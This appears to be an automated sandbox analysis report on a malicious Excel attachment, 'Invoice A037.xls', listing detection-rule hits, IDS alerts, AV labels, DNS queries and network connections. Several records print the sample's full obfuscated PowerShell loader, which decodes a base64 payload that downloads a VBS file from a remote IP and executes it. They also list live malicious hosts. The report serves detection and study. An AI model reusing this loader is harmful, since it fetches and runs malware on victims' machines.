            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4028, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , ProcessId: 4028, ProcessName: wscript.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3220, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", CommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICA
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Local\Temp\dgi33iu0.y1c.ps1

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", ProcessId: 3928, ProcessName: csc.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-11T10:53:54.536447+010020241971A Network Trojan was detected23.95.235.2980192.168.2.2249162TCP
            2024-12-11T10:53:59.563742+010020241971A Network Trojan was detected23.95.235.2980192.168.2.2249164TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-11T10:53:54.536095+010020244491Attempted User Privilege Gain192.168.2.224916223.95.235.2980TCP
            2024-12-11T10:53:59.563476+010020244491Attempted User Privilege Gain192.168.2.224916423.95.235.2980TCP
            2024-12-11T10:54:22.930971+010020244491Attempted User Privilege Gain192.168.2.224917223.95.235.2980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-11T10:54:22.447546+010020490381A Network Trojan was detected151.101.1.137443192.168.2.2249168TCP
            2024-12-11T10:54:41.001291+010020490381A Network Trojan was detected151.101.1.137443192.168.2.2249174TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-11T10:54:07.351485+010028587951A Network Trojan was detected192.168.2.224916523.95.235.2980TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasaAvira URL Cloud: Label: malware
            Source: https://short.ruksk.com/Avira URL Cloud: Label: malware
            Source: https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kAvira URL Cloud: Label: malware
            Source: Invoice A037.xlsVirustotal: Detection: 19%Perma Link
            Source: Invoice A037.xlsReversingLabs: Detection: 21%
            Source: Invoice A037.xlsJoe Sandbox ML: detected

            Phishing

            barindex
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta, type: DROPPED
            Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49168 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49166 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49170 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49173 version: TLS 1.2
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdb source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdbhP source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdb source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdbhP source: powershell.exe, 00000008.00000002.457674292.00000000030D7000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: .pdbB source: powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp

            Spreading

            barindex
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith[1].tiff, type: DROPPED

            Software Vulnerabilities

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: paste.rs
            Source: global trafficDNS query: name: paste.rs
            Source: global trafficDNS query: name: res.cloudinary.com
            Source: global trafficDNS query: name: res.cloudinary.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: short.ruksk.com
            Source: global trafficDNS query: name: paste.rs
            Source: global trafficDNS query: name: paste.rs
            Source: global trafficDNS query: name: res.cloudinary.com
            Source: global trafficDNS query: name: res.cloudinary.com
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 23.95.235.29:80
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
